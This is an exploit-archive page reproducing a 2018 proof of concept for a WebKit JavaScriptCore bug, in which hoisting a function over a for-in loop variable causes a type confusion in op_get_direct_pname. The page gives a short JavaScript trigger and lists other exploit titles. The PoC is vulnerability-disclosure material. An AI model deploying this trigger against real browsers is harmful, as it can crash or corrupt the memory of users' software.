Webkit jsc bytecodegenerator::hoistsloppymodefunctionifnecessary does not invalidate the forincontext object Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-11-29 | Type : dos | Platform : multiple
This exploit / vulnerability Webkit jsc bytecodegenerator::hoistsloppymodefunctionifnecessary does not invalidate the forincontext object is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

/*
This is simillar to issue 1263 . When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler which uses the property variable directly as a string object without any check.

PoC:
*/

function trigger() {
let o = {a: 1};
for (var k in o) {
{
k = 0x1234;

function k() {

}
}

o[k];
}
}

trigger();

Webkit jsc bytecodegenerator::hoistsloppymodefunctionifnecessary does not invalidate the forincontext object


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Webkit jsc bytecodegenerator::hoistsloppymodefunctionifnecessary does not invalidate the forincontext object Vulnerability / Exploit